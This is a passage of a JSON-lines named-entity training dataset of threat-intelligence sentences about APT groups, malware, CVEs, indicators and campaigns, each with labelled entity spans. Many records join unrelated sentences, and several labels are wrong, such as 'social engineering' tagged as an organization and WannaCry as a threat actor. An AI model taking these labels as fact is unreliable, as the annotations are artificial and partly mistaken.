Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel . Based on our analysis and the behaviour of the executed malware , the correct interpretation is the first one based on the oldest version of uncompyle6 . The vendor declined to release an update within the 90 - day period as outlined in Cisco ’s vulnerability disclosure policy .", "spans": {"THREAT_ACTOR: HELIX KITTEN actors": [[139, 158]], "ORGANIZATION: personnel": [[294, 303]], "TOOL: uncompyle6": [[447, 457]], "ORGANIZATION: Cisco ’s": [[543, 551]]}, "info": {"id": "cyberner_stix_train_001422", "source": "cyberner_stix_train"}} {"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . Back in February , we noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": {"MALWARE: JavaScript": [[4, 14]], "THREAT_ACTOR: Patchwork": [[286, 295]], "THREAT_ACTOR: Confucius groups": [[300, 316]]}, "info": {"id": "cyberner_stix_train_001423", "source": "cyberner_stix_train"}} {"text": "Checking for antivirus and other security products using WMI .", "spans": {"TOOL: WMI": [[57, 60]]}, "info": {"id": "cyberner_stix_train_001424", "source": "cyberner_stix_train"}} {"text": "The campaign corresponds with a period of heightened tension in Gaza .", "spans": {}, "info": {"id": "cyberner_stix_train_001425", "source": "cyberner_stix_train"}} {"text": "Figure 9 : Prompt for application permissions upon installation Figures 10 and 11 show the other permission screens for the app : Figure 10 Figure 10 : Part 1 of the permission screen for the app Figure 11 : Part 2 of the permission 
screen for the app Once installed the app will place a legitimate looking icon on the phone ’ s home screen , again using branding stolen from the bank . Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa . Deep Panda : Shell Crew , WebMasters , KungFu Kittens , PinkPanther , Black Vine .", "spans": {"THREAT_ACTOR: CIA's": [[446, 451]], "TOOL: Assassin": [[591, 599]], "TOOL: Medusa": [[604, 610]], "THREAT_ACTOR: Deep Panda": [[613, 623]], "THREAT_ACTOR: Shell Crew": [[626, 636]], "THREAT_ACTOR: WebMasters": [[639, 649]], "THREAT_ACTOR: KungFu Kittens": [[652, 666]], "THREAT_ACTOR: PinkPanther": [[669, 680]], "THREAT_ACTOR: Black Vine": [[683, 693]]}, "info": {"id": "cyberner_stix_train_001426", "source": "cyberner_stix_train"}} {"text": "FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy . Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: admin@338": [[28, 37]], "THREAT_ACTOR: group": [[69, 74]], "ORGANIZATION: financial": [[122, 131]], "ORGANIZATION: economic": [[134, 142]], "ORGANIZATION: trade policy": [[149, 161]], "ORGANIZATION: Symantec": [[296, 304]]}, "info": {"id": "cyberner_stix_train_001427", "source": "cyberner_stix_train"}} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]], "TOOL: Word": [[205, 209]], "VULNERABILITY: CVE-2017-11882": [[248, 262]], "FILEPATH: 'NavShExt.dll'": [[329, 343]], "FILEPATH: iexplore.exe": [[374, 386]]}, "info": {"id": "cyberner_stix_train_001428", "source": "cyberner_stix_train"}} {"text": "It is likely that BRONZE PRESIDENT is sponsored or at least tolerated by the PRC government .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[18, 34]], "ORGANIZATION: PRC": [[77, 80]]}, "info": {"id": "cyberner_stix_train_001429", "source": "cyberner_stix_train"}} {"text": "Also , DealersChoice requires multiple interactions with an active C2 server to successfully exploit an end system .", "spans": {"TOOL: DealersChoice": [[7, 20]], "TOOL: C2": [[67, 69]]}, "info": {"id": "cyberner_stix_train_001430", "source": "cyberner_stix_train"}} {"text": "This adversary displays a particular focus on targeting entities in the Ukraine and is believed to be behind the Ukrainian energy sector attacks that caused widespread power outages in late 2015 . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"THREAT_ACTOR: attackers": [[201, 210]], "MALWARE: Poison Ivy RAT": [[228, 242]], "MALWARE: WinHTTPHelper": [[247, 260]], "MALWARE: malware": [[261, 268]], "ORGANIZATION: government officials": [[300, 320]]}, "info": {"id": "cyberner_stix_train_001431", "source": "cyberner_stix_train"}} {"text": "We also describe apps that we think are coming from the same author or a group of authors . 
In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar . The lure documents also used the Japanese calendar , as indicated by the 27th year in the Heisei period . The file , matches signatures for the tried - and - true China Chopper .", "spans": {"THREAT_ACTOR: the tried - and - true China Chopper": [[387, 423]]}, "info": {"id": "cyberner_stix_train_001432", "source": "cyberner_stix_train"}} {"text": "KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia , and finally moving their focus further east into late 2017 .", "spans": {"ORGANIZATION: KSN": [[0, 3]], "ORGANIZATION: NATO": [[81, 85]]}, "info": {"id": "cyberner_stix_train_001433", "source": "cyberner_stix_train"}} {"text": "The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: EternalBlue exploit": [[168, 187]], "THREAT_ACTOR: WannaCry": [[200, 208]], "TOOL: emails": [[260, 266]], "MALWARE: Winnti installer": [[269, 285]]}, "info": {"id": "cyberner_stix_train_001434", "source": "cyberner_stix_train"}} {"text": "Again , we control the content of the file , the size and the path and filename .", "spans": {}, "info": {"id": "cyberner_stix_train_001435", "source": "cyberner_stix_train"}} {"text": "Webinjects : According to the bot ’ s configuration , if a webinject is set for a given application , it will be executed . 
If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets .", "spans": {"TOOL: xlsm file": [[162, 171]], "MALWARE: it": [[174, 176]], "THREAT_ACTOR: APT33": [[313, 318]], "ORGANIZATION: military": [[436, 444]], "ORGANIZATION: commercial": [[449, 459]]}, "info": {"id": "cyberner_stix_train_001436", "source": "cyberner_stix_train"}} {"text": "] comuseraccount [ . The Infy group also appears to engage in espionage activities against foreign governments and businesses . This is supported by contextual information on the Internet for the email address “ lfengg@163.com , ” which was supplied in the registration information for seven of the 107 zones . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": {"THREAT_ACTOR: Infy group": [[25, 35]], "ORGANIZATION: governments": [[99, 110]], "ORGANIZATION: businesses": [[115, 125]], "TOOL: email": [[196, 201]], "EMAIL: lfengg@163.com": [[212, 226]], "SYSTEM: CSP": [[311, 314]]}, "info": {"id": "cyberner_stix_train_001437", "source": "cyberner_stix_train"}} {"text": "If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . 
Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 .", "spans": {"TOOL: DoublePulsar backdoor": [[7, 28]], "TOOL: SMB worm": [[55, 63]], "VULNERABILITY: Eternalblue SMBv1 exploit": [[108, 133]], "ORGANIZATION: Kaspersky APT Intelligence Reporting subscription": [[136, 185]]}, "info": {"id": "cyberner_stix_train_001438", "source": "cyberner_stix_train"}} {"text": "A quick search produced results about a personal page and , what is more interesting , a GitHub account that contains a forked Conversation repository . ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials . TA505 is Expanding its Operations In the last few days , during monitoring activities , Yoroi CERT noticed a suspicious attack against an Italian organization .", "spans": {"ORGANIZATION: GitHub": [[89, 95]], "ORGANIZATION: ASERT": [[153, 158]], "THREAT_ACTOR: TA505": [[295, 300]], "ORGANIZATION: Yoroi CERT": [[383, 393]]}, "info": {"id": "cyberner_stix_train_001439", "source": "cyberner_stix_train"}} {"text": "Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months .", "spans": {"ORGANIZATION: Microsoft Analytics": [[0, 19]], "MALWARE: Winnti": [[31, 37]]}, "info": {"id": "cyberner_stix_train_001440", "source": "cyberner_stix_train"}} {"text": "The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services , chosen by checking the operating system version , to create new Google accounts . From late April to early May , the attackers focused on human rights related NGOs . FireEye Threat Intelligence and the Microsoft Threat Intelligence Center investigated a command-and-control ( C2 ) obfuscation tactic used on Microsoft ’s TechNet , a web portal for IT professionals . 
Using this remote , the student was able to capture and replay legitimate tram signals .", "spans": {"SYSTEM: Android API": [[73, 84]], "ORGANIZATION: Google": [[196, 202]], "ORGANIZATION: FireEye": [[298, 305]], "ORGANIZATION: Microsoft": [[334, 343], [440, 449]], "TOOL: command-and-control": [[386, 405]], "TOOL: C2": [[408, 410]], "TOOL: TechNet": [[453, 460]]}, "info": {"id": "cyberner_stix_train_001441", "source": "cyberner_stix_train"}} {"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "VULNERABILITY: zero-day vulnerability": [[69, 91]]}, "info": {"id": "cyberner_stix_train_001442", "source": "cyberner_stix_train"}} {"text": "The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . 
Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": {"MALWARE: malware": [[4, 11]], "ORGANIZATION: Trend Micro": [[155, 166]], "THREAT_ACTOR: Patchwork": [[202, 211]], "THREAT_ACTOR: Confucius groups": [[216, 232]]}, "info": {"id": "cyberner_stix_train_001443", "source": "cyberner_stix_train"}} {"text": "After decrypting the content , the ‘ onload2 ’ function will issue another HTTP GET request with the system data as a parameter , but this time to the C2 using a URL from the ‘ r4 ’ variable .", "spans": {"TOOL: C2": [[151, 153]]}, "info": {"id": "cyberner_stix_train_001444", "source": "cyberner_stix_train"}} {"text": "Each of them consists of a set of plugins designed for different tasks : while FuzzBunch plugins are responsible for reconnaissance and attacking a victim , plugins in the DanderSpritz framework are developed for managing already infected victims . 
The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": {"TOOL: FuzzBunch plugins": [[79, 96]], "TOOL: DanderSpritz": [[172, 184]]}, "info": {"id": "cyberner_stix_train_001445", "source": "cyberner_stix_train"}} {"text": "It can thwart detection by automated analysis engines and sandbox solutions .", "spans": {}, "info": {"id": "cyberner_stix_train_001446", "source": "cyberner_stix_train"}} {"text": "While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": {}, "info": {"id": "cyberner_stix_train_001447", "source": "cyberner_stix_train"}} {"text": "Finally , the known targets of the Dukes - Eastern European foreign ministries , western think tanks and governmental organizations , even Russian-speaking drug dealers - conform to publiclyknown Russian foreign policy and security policy interests .", "spans": {"THREAT_ACTOR: Dukes": [[35, 40]]}, "info": {"id": "cyberner_stix_train_001448", "source": "cyberner_stix_train"}} {"text": "These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . 
It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in .", "spans": {"ORGANIZATION: social engineering": [[28, 46]], "TOOL: remote administration tools": [[199, 226]], "TOOL: RATs": [[229, 233]], "ORGANIZATION: oil and gas": [[358, 369]], "FILEPATH: SWAnalytics": [[458, 469]]}, "info": {"id": "cyberner_stix_train_001449", "source": "cyberner_stix_train"}} {"text": "This section describes the history , behavior , and tactics of a newly discovered targeted activity group , which Microsoft has code-named PLATINUM . This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems .", "spans": {"THREAT_ACTOR: activity group": [[91, 105]], "ORGANIZATION: Microsoft": [[114, 123]], "THREAT_ACTOR: PLATINUM": [[139, 147]]}, "info": {"id": "cyberner_stix_train_001450", "source": "cyberner_stix_train"}} {"text": "We have since been able to identify at least two separate OnionDuke botnets .", "spans": {"MALWARE: OnionDuke": [[58, 67]]}, "info": {"id": "cyberner_stix_train_001451", "source": "cyberner_stix_train"}} {"text": "In the second step it asks the victim for the Accessibility Service privilege as visible in following screenshot : Ginp Accessibility request Once the user grants the requested Accessibility Service privilege , Ginp starts by granting itself additional permissions , such as ( dynamic ) permissions required in order to be able to send messages and make calls , without requiring any further action from the victim . We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date . 
Interestingly , the C2 servers linking 9002 to Daserf were described in the report of an Adobe Flash Zero-day attack from FireEye in 2013 .", "spans": {"MALWARE: Ginp": [[115, 119], [211, 215]], "THREAT_ACTOR: APT10": [[428, 433]], "TOOL: C2": [[554, 556]], "MALWARE: 9002": [[573, 577]], "MALWARE: Daserf": [[581, 587]], "TOOL: Adobe Flash": [[623, 634]], "VULNERABILITY: Zero-day": [[635, 643]], "ORGANIZATION: FireEye": [[656, 663]]}, "info": {"id": "cyberner_stix_train_001452", "source": "cyberner_stix_train"}} {"text": "Here ’ s how it works : At first glance , the email shown in Figure 1 looks like any other phishing email that asks the user to download an invoice . The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" . One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": {"ORGANIZATION: provider": [[222, 230]], "THREAT_ACTOR: CobaltGoblin": [[367, 379]], "THREAT_ACTOR: FIN7": [[384, 388]], "SYSTEM: CSP": [[528, 531]]}, "info": {"id": "cyberner_stix_train_001453", "source": "cyberner_stix_train"}} {"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . 
Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: legitimate administration tools": [[15, 46]], "VULNERABILITY: zero-day": [[232, 240]], "TOOL: Adobe Flash Player": [[241, 259]]}, "info": {"id": "cyberner_stix_train_001454", "source": "cyberner_stix_train"}} {"text": "A subsequent investigation revealed that the spyware has the following capabilities : Records every phone call ( literally the conversation as a media file ) , then sends it together with the caller id to the C & C ( incall3.php and outcall3.php ) Logs every incoming SMS message ( SMS body and SMS sender ) to C & C ( script3.php ) Has capability to hide self Can send all call logs ( “ content : //call_log/calls ” , info : callname , callnum , calldate , calltype , callduration Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"THREAT_ACTOR: Silence:": [[522, 530]], "ORGANIZATION: Group-IB's": [[655, 665]], "MALWARE: Carbanak": [[703, 711]], "THREAT_ACTOR: criminals": [[778, 787]], "ORGANIZATION: financial industry": [[828, 846]], "ORGANIZATION: customers": [[870, 879]]}, "info": {"id": "cyberner_stix_train_001455", "source": "cyberner_stix_train"}} {"text": "Figure 9 shows the number of RuMMS infections recorded in the last four months . On January 8 , 2018 , the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East . 
It is interesting to note that the filename of the downloaded image is randomly generated based on a dictionary : Array (\"cartoon\" , \"img\" ,\"photo\") . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": {"MALWARE: RuMMS": [[29, 34]], "THREAT_ACTOR: OilRig": [[107, 113]], "THREAT_ACTOR: threat group": [[114, 126]], "ORGANIZATION: insurance agency": [[200, 216]], "SYSTEM: Microsoft Exchange servers": [[436, 462]], "ORGANIZATION: Microsoft": [[465, 474]]}, "info": {"id": "cyberner_stix_train_001456", "source": "cyberner_stix_train"}} {"text": "In this way , the advanced HammerDuke variant attempts to hide its network traffic in more legitimate use of Twitter .", "spans": {"MALWARE: HammerDuke": [[27, 37]], "TOOL: Twitter": [[109, 116]]}, "info": {"id": "cyberner_stix_train_001457", "source": "cyberner_stix_train"}} {"text": "Based on this , we are confident in our conclusion that the Dukes ’ primary mission is the collection of intelligence to support foreign and security policy decision-making .", "spans": {"THREAT_ACTOR: Dukes": [[60, 65]]}, "info": {"id": "cyberner_stix_train_001458", "source": "cyberner_stix_train"}} {"text": "The best example of that is that it does n't take advantage of the accessibility framework , collecting information on non-rooted devices . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . They kept track of their targeted attacks by embedding a “ campaign tag ” in the malware that appears to describe when each attack was launched and , in some cases , the nature of its target . 
As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": {"TOOL: Lambert family malware": [[159, 181]], "ORGANIZATION: FireEye": [[232, 239]], "VULNERABILITY: zero day exploit": [[262, 278]], "VULNERABILITY: CVE-2014-4148": [[281, 294]], "SYSTEM: twitter": [[537, 544]], "ORGANIZATION: CSP": [[590, 593]]}, "info": {"id": "cyberner_stix_train_001459", "source": "cyberner_stix_train"}} {"text": "This appears to be necessary to determine the number of banks the victim may use . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . ESET detection names : Win32 / Shadowpad.C trojan Win64 / Winnti.CA trojan . 
When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": {"MALWARE: documents": [[87, 96]], "VULNERABILITY: CVE-2012-0158": [[180, 193]], "VULNERABILITY: Microsoft Word vulnerabilities": [[249, 279]], "ORGANIZATION: ESET": [[324, 328]], "SYSTEM: Win32": [[347, 352]], "FILEPATH: Shadowpad.C": [[355, 366]], "MALWARE: trojan": [[367, 373], [392, 398]], "SYSTEM: Win64": [[374, 379]], "FILEPATH: Winnti.CA": [[382, 391]], "ORGANIZATION: CrowdStrike researchers": [[406, 429]], "MALWARE: CozyDuke": [[483, 491]], "MALWARE: CozyBear": [[508, 516]], "MALWARE: CozyCar": [[519, 526]], "MALWARE: Office Monkeys": [[531, 545]], "THREAT_ACTOR: APT29": [[633, 638]], "ORGANIZATION: US White House": [[793, 807]], "ORGANIZATION: Department of State": [[810, 829]], "ORGANIZATION: Democratic National Committee": [[838, 867]]}, "info": {"id": "cyberner_stix_train_001460", "source": "cyberner_stix_train"}} {"text": "Usually , when users are already infected with malware like TrickBot on their desktop , they will see a web injection asking for their mobile device operating system ( OS ) type and phone number . Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . 
Just over a week later , on January 16 , 2018 , we observed an attack on a Middle Eastern financial institution .", "spans": {"MALWARE: TrickBot": [[60, 68]], "THREAT_ACTOR: Cloud Atlas": [[210, 221]], "VULNERABILITY: CVE-2017-11882": [[337, 351]], "VULNERABILITY: CVE-2018-0802": [[363, 376]], "ORGANIZATION: financial institution": [[469, 490]]}, "info": {"id": "cyberner_stix_train_001461", "source": "cyberner_stix_train"}} {"text": "The real C & C address is encoded in the Twitter names , and can only be revealed once decoded . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset . Below is a list of AdrGen . Mandiant used these signatures to search the XPdb for additional attacker payloads that were deleted by the threat actor or otherwise unable to be identified through other forms of analysis .", "spans": {"ORGANIZATION: Twitter": [[41, 48]], "ORGANIZATION: FireEye": [[97, 104]], "TOOL: RIPTIDE": [[130, 137]], "TOOL: HIGHTIDE": [[141, 149]], "THREAT_ACTOR: APT12": [[220, 225]], "MALWARE: attacker payloads": [[364, 381]]}, "info": {"id": "cyberner_stix_train_001462", "source": "cyberner_stix_train"}} {"text": "Interestingly , the nature of these modifications suggests that their primary purpose was to regain the element of stealth and undetectability that had been lost almost a year earlier .", "spans": {}, "info": {"id": "cyberner_stix_train_001463", "source": "cyberner_stix_train"}} {"text": "We saw five samples built on the same date in December 2015 , and six on the same date in January , further solidifying the link between each sample .", "spans": {}, "info": {"id": "cyberner_stix_train_001464", "source": "cyberner_stix_train"}} {"text": "Exhibit 4 shows the network traffic generated by the sample , a http POST request containing the system information collected .", "spans": {}, "info": {"id": "cyberner_stix_train_001465", "source": 
"cyberner_stix_train"}} {"text": "Downeks is a backdoor with only very basic capabilities .", "spans": {"MALWARE: Downeks": [[0, 7]]}, "info": {"id": "cyberner_stix_train_001466", "source": "cyberner_stix_train"}} {"text": "Code snippets showing : the decoding algorithm shared by both Bouncing Golf and Domestic Kitten ( top ) , the format of data that Domestic Kitten ’ s malware targets to steal ( center ) , and how both Bouncing Golf ( bottom left ) and Domestic Kitten ( bottom right ) use \" \" as a separator in their command strings . We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 . This company seems to have been used by the FIN7 threat actor to hire new people as translators , developers and pentesters . Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation , such as through the use of virtualization technology.[4 ] Bundlore uses the mktemp utility to make unique file and directory names for payloads , such as TMP_DIR=`mktemp", "spans": {"MALWARE: Bouncing Golf": [[62, 75], [201, 214]], "MALWARE: Domestic Kitten": [[80, 95], [130, 145], [235, 250]], "THREAT_ACTOR: FIN7": [[542, 546]], "THREAT_ACTOR: Adversaries": [[624, 635]], "MALWARE: Bundlore": [[851, 859]], "TOOL: mktemp utility": [[869, 883]]}, "info": {"id": "cyberner_stix_train_001467", "source": "cyberner_stix_train"}} {"text": "The malware cleans the system event logs using OpenEventLog/ClearEventLog APIs , and then terminates the setup procedure with a call to StartService to run the stage 4 malware . COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training . Next , the payload is read from the .png cover file , which seems to have been taken from an inspirational quotes website3 . 
In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[178, 190]], "ORGANIZATION: social media": [[204, 216]], "ORGANIZATION: social engineering": [[260, 278]], "TOOL: ProxyNotShell": [[430, 443]], "TOOL: Remote PowerShell service": [[482, 507]]}, "info": {"id": "cyberner_stix_train_001468", "source": "cyberner_stix_train"}} {"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies .", "spans": {"TOOL: DropIt sample": [[28, 41]], "MALWARE: %TEMP%\\flash_update.exe": [[179, 202]], "TOOL: Flash Player installer": [[227, 249]], "ORGANIZATION: electric companies": [[355, 373]]}, "info": {"id": "cyberner_stix_train_001469", "source": "cyberner_stix_train"}} {"text": "Analysis of this campaign shows us once more that attackers are creative and use the news to compromise the targets .", "spans": {}, "info": {"id": "cyberner_stix_train_001470", "source": "cyberner_stix_train"}} {"text": "JUNE 2015 , Germany ’s Federal Office for Security in Information Technology ( BSI ) announced that APT28 was likely responsible for the spear phishing emails sent to members of several German political parties .", "spans": {"THREAT_ACTOR: APT28": [[100, 105]], "TOOL: emails": [[152, 158]]}, "info": {"id": "cyberner_stix_train_001471", "source": "cyberner_stix_train"}} {"text": "The export called “ k ” is a wrapper for the “ LoadLibraryA ” API function .", "spans": {}, "info": {"id": "cyberner_stix_train_001472", "source": "cyberner_stix_train"}} {"text": "SHA256 0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa .", "spans": {"FILEPATH: 
0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa": [[7, 71]]}, "info": {"id": "cyberner_stix_train_001473", "source": "cyberner_stix_train"}} {"text": "Activities are key building blocks , central to an app ’ s navigation , for example . In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort .", "spans": {"ORGANIZATION: Group-IB": [[96, 104]], "MALWARE: Ivoke": [[170, 175]], "THREAT_ACTOR: Operation Cleaver": [[288, 305]]}, "info": {"id": "cyberner_stix_train_001474", "source": "cyberner_stix_train"}} {"text": "Android malware has drastically lower rates of success when app installations outside of Google Play are barred . Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group . APT33 : 162.250.145.222 [REDACTED].ddns.net . loop all over the string to execute the decoding operation .", "spans": {"SYSTEM: Android": [[0, 7]], "SYSTEM: Google Play": [[89, 100]], "ORGANIZATION: Microsoft": [[124, 133]], "ORGANIZATION: Facebook": [[158, 166]], "THREAT_ACTOR: Lazarus Group": [[257, 270]], "THREAT_ACTOR: APT33": [[273, 278]], "IP_ADDRESS: 162.250.145.222": [[281, 296]], "DOMAIN: [REDACTED].ddns.net": [[297, 316]]}, "info": {"id": "cyberner_stix_train_001475", "source": "cyberner_stix_train"}} {"text": "Call logs . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . 
PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": {"THREAT_ACTOR: APT34": [[31, 36]], "VULNERABILITY: Microsoft Office vulnerability": [[51, 81]], "VULNERABILITY: CVE-2017-11882": [[82, 96]], "TOOL: POWRUNER": [[107, 115]], "TOOL: BONDUPDATER": [[120, 131]], "ORGANIZATION: Microsoft": [[155, 164]], "THREAT_ACTOR: PROMETHIUM": [[182, 192]], "THREAT_ACTOR: NEODYMIUM": [[197, 206]], "VULNERABILITY: exploit": [[220, 227]], "VULNERABILITY: CVE-2016-4117": [[232, 245]], "TOOL: Flash": [[273, 278]]}, "info": {"id": "cyberner_stix_train_001476", "source": "cyberner_stix_train"}} {"text": "If the user installs the profile , the malicious website will open , revealing it to be an Apple phishing site , as seen in figure 2 . APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals . In ping mode, Glimpse uses a .NET . Figure 8 : Scilc.exe usage example", "spans": {"ORGANIZATION: Apple": [[91, 96]], "THREAT_ACTOR: APT12": [[135, 140]], "MALWARE: Glimpse": [[237, 244]], "FILEPATH: a .NET": [[250, 256]], "TOOL: Scilc.exe": [[270, 279]]}, "info": {"id": "cyberner_stix_train_001477", "source": "cyberner_stix_train"}} {"text": "DanaBot is a Trojan that includes banking site web injections and stealer functions . 
According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": {"TOOL: DanaBot": [[0, 7]], "TOOL: Trojan": [[13, 19]], "ORGANIZATION: security firm": [[103, 116]], "ORGANIZATION: military officials": [[149, 167]], "TOOL: emails": [[187, 193]], "TOOL: Adobe Reader": [[239, 251]], "VULNERABILITY: vulnerability": [[252, 265]]}, "info": {"id": "cyberner_stix_train_001478", "source": "cyberner_stix_train"}} {"text": "We gathered information from affected devices , and concurrently , attempted to acquire Chrysaor apps to better understand its impact on users . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . This is not the first time the gaming industry has been targeted by attackers who compromise game developers , insert backdoors into a game’s build environment , and then have their malware distributed as legitimate software . securityd-555549440fca1d2f1e613094b0c768d393f83d7f", "spans": {"MALWARE: Chrysaor": [[88, 96]], "THREAT_ACTOR: Leafminer": [[149, 158]], "THREAT_ACTOR: operators": [[159, 168]], "VULNERABILITY: EternalBlue": [[173, 184]], "MALWARE: securityd-555549440fca1d2f1e613094b0c768d393f83d7f": [[498, 548]]}, "info": {"id": "cyberner_stix_train_001479", "source": "cyberner_stix_train"}} {"text": "When it runs , it periodically connects to its designated server via an unencrypted HTTP request and sends over a JSON object that contains data gleaned from the victim ’ s phone . It seems that the main objective of the attackers was information gathering from the infected computers . 
